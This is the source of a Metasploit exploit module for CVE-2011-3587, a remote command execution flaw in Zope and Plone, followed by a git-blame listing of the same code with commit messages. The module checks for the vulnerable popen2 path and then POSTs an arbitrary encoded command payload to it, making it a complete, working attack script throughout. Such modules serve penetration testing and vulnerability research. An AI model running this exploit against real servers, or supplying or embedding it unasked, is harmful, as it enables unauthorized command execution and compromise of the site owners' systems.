metasploit-framework/modules/exploits/multi/http/plone_popen2.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Plone and Zope XMLTools Remote Command Execution',
      'Description'    => %q{
        Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x
        through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute
        arbitrary commands via vectors related to the p_ class in OFS/misc_.py and
        the use of Python modules.

      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',              # Plone Security Team, original vulnerability discovery
          'Nick Miles',           # Original exploit
          'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2011-3587'],
          ['OSVDB', '76105'],
          ['EDB', '18262'],
          ['URL', 'http://plone.org/products/plone/security/advisories/20110928']
        ],
      'Privileged'     => false,
      'Payload'        =>
      {
        'Compat'     =>
        {
          'PayloadType'  => 'cmd',
          'RequiredCmd'  => 'generic telnet perl ruby python',
        }
      },
      'Platform'       => %w{ linux unix },
      'Arch'           => ARCH_CMD,
      'Targets'        => [['Automatic',{}]],
      'DisclosureDate' => 'Oct 04 2011',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('URI',[true, "The path to the Plone installation", "/"]),
      ],self.class)
    register_autofilter_ports([ 8080 ])
  end

  def check
    uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')

    res = send_request_raw(
      {
        'uri'       => uri
      }, 25)
    if (res.headers['Bobo-Exception-Type'].to_s =~ /zExceptions.BadRequest/)
      return Exploit::CheckCode::Appears
    end
    # patched == zExceptions.NotFound
    return Exploit::CheckCode::Safe
  end

  def exploit
    uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')

    send_request_cgi(
      {
        'method'    => 'POST',
        'uri'       => uri,
        'vars_post' =>
          {
            'cmd' => payload.encoded,
          }
      }, 0.5) # short timeout, we don't care about the response
  end
end
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00			`##`

			`require 'msf/core'`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = ExcellentRanking`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::HttpClient`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => 'Plone and Zope XMLTools Remote Command Execution',`
			`'Description' => %q{`
			`Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x`
			`through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute`
			`arbitrary commands via vectors related to the p_ class in OFS/misc_.py and`
			`the use of Python modules.`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
Various other one-off nonhuman author credits [See #5012] 2015-04-02 20:25:47 +00:00			`'Unknown', # Plone Security Team, original vulnerability discovery`
Retab modules 2013-08-30 21:28:54 +00:00			`'Nick Miles', # Original exploit`
			`'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module`
			`],`
			`'References' =>`
			`[`
			`['CVE', '2011-3587'],`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`['OSVDB', '76105'],`
Retab modules 2013-08-30 21:28:54 +00:00			`['EDB', '18262'],`
			`['URL', 'http://plone.org/products/plone/security/advisories/20110928']`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
			`'RequiredCmd' => 'generic telnet perl ruby python',`
			`}`
			`},`
Prefer Ruby style for single word collections According to the Ruby style guide, %w{} collections for arrays of single words are preferred. They're easier to type, and if you want a quick grep, they're easier to search. This change converts all Payloads to this format if there is more than one payload to choose from. It also alphabetizes the payloads, so the order can be more predictable, and for long sets, easier to scan with eyeballs. See: https://github.com/bbatsov/ruby-style-guide#collections 2013-09-24 17:33:31 +00:00			`'Platform' => %w{ linux unix },`
Retab modules 2013-08-30 21:28:54 +00:00			`'Arch' => ARCH_CMD,`
			`'Targets' => [['Automatic',{}]],`
			`'DisclosureDate' => 'Oct 04 2011',`
			`'DefaultTarget' => 0`
			`))`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`Opt::RPORT(8080),`
			`OptString.new('URI',[true, "The path to the Plone installation", "/"]),`
			`],self.class)`
			`register_autofilter_ports([ 8080 ])`
			`end`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def check`
			`uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`res = send_request_raw(`
			`{`
			`'uri' => uri`
			`}, 25)`
			`if (res.headers['Bobo-Exception-Type'].to_s =~ /zExceptions.BadRequest/)`
Saving progress Progress group 4: Making sure these checks comply with the new guidelines. Please read: "How to write a check() method" found in the wiki. 2014-01-21 20:10:35 +00:00			`return Exploit::CheckCode::Appears`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
			`# patched == zExceptions.NotFound`
			`return Exploit::CheckCode::Safe`
			`end`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
			`uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`send_request_cgi(`
			`{`
			`'method' => 'POST',`
			`'uri' => uri,`
			`'vars_post' =>`
			`{`
			`'cmd' => payload.encoded,`
			`}`
			`}, 0.5) # short timeout, we don't care about the response`
			`end`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00			`end`